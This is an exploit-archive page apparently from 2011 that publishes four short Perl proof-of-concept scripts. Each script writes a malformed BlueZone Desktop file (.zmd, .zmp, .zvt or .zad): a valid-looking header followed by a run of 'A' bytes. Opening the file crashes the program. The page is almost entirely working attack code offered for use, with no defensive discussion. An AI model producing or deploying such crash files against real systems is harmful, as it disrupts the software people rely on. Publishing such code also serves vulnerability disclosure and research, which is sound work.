[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BlueZone Desktop Multiple Malformed files Local Denial of Service Vulnerabilities
# Published : 2011-10-25
# Author :
# Previous Title : XChat Heap Overflow DoS
# Next Title : Optima APIFTP Server <= 1.5.2.13 Multiple Vulnerabilities


# Exploit Title: BlueZone Desktop Malformed .zmd file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
 #To trigger: Run this script, double click file to open with bzmd.exe, program dies.
 
my $file = "bluez.zmd";
my $head = "BZMD215AK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);

exit();
# Exploit Title: BlueZone Desktop Malformed .zmp file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzmp.exe, program dies.
 
my $file = "bluez.zmp";
my $head = "BZMP215AK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);

exit();
# Exploit Title: BlueZone Desktop Malformed .zvt file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzvt.exe, program dies.
 
my $file = "bluez.zvt";
my $head = "BZVT100AK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);

exit();
# Exploit Title: BlueZone Desktop Malformed .zad file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzad.exe, program dies.
 
my $file = "bluez.zad";
my $head = "BZAD200BK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);